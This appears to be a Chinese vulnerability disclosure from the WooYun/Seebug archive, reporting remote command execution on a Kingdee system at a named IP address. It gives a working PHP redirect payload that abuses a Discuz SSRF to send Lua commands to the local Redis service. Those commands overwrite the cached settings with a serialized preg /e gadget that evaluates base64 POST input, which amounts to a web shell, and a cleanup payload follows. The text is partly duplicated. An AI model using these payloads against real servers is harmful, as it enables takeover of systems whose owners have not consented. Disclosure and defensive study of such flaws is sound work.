### 简要描述: 金蝶某系统存在远程命令执行 ### 详细说明: http://118.194.40.105/ 为discuz,且服务器存在redis服务,通过ssrf [WooYun: Discuz!另一处SSRF无须登陆无须条件](http://www.wooyun.org/bugs/wooyun-2015-0151179) 可以更改discuz缓存代码,从而实现远程命令执行。 设置 ``` <?php header('Location: dict://127.0.0.1:6379/eval:"local:t=redis.call(\'keys\',\'*_setting\');for:i,v:in:ipairs(t):do:redis.call(\'set\',v,\'a\x3a2\x3a{s\x3a6\x3a\"output\";a\x3a1\x3a{s\x3a4\x3a\"preg\";a\x3a2\x3a{s\x3a6\x3a\"search\";s\x3a5\x3a\"/.*/e\";s\x3a7\x3a\"replace\";s\x3a33\x3a\"eval(base64_decode($_POST[c]));\";}}s\x3a13\x3a\"rewritestatus\";i\x3a1;}\'):end;return:1;":0'); ?> ``` 还原 <?php header('Location: dict://127.0.0.1:6379/eval:"local:t=redis.call(\'keys\',\'*_setting\');for:i,v:in:ipairs(t):do:redis.call(\'del\',v):end;return:1;":0'); ?> ### 漏洞证明: [<img src="https://images.seebug.org/upload/201605/3015261798c2c1960f60fb5008662c89bda84304.png" alt="1.png" width="600"...
### 简要描述: 金蝶某系统存在远程命令执行 ### 详细说明: http://118.194.40.105/ 为discuz,且服务器存在redis服务,通过ssrf [WooYun: Discuz!另一处SSRF无须登陆无须条件](http://www.wooyun.org/bugs/wooyun-2015-0151179) 可以更改discuz缓存代码,从而实现远程命令执行。 设置 ``` <?php header('Location: dict://127.0.0.1:6379/eval:"local:t=redis.call(\'keys\',\'*_setting\');for:i,v:in:ipairs(t):do:redis.call(\'set\',v,\'a\x3a2\x3a{s\x3a6\x3a\"output\";a\x3a1\x3a{s\x3a4\x3a\"preg\";a\x3a2\x3a{s\x3a6\x3a\"search\";s\x3a5\x3a\"/.*/e\";s\x3a7\x3a\"replace\";s\x3a33\x3a\"eval(base64_decode($_POST[c]));\";}}s\x3a13\x3a\"rewritestatus\";i\x3a1;}\'):end;return:1;":0'); ?> ``` 还原 <?php header('Location: dict://127.0.0.1:6379/eval:"local:t=redis.call(\'keys\',\'*_setting\');for:i,v:in:ipairs(t):do:redis.call(\'del\',v):end;return:1;":0'); ?> ### 漏洞证明: [<img src="https://images.seebug.org/upload/201605/3015261798c2c1960f60fb5008662c89bda84304.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201605/3015261798c2c1960f60fb5008662c89bda84304.png)
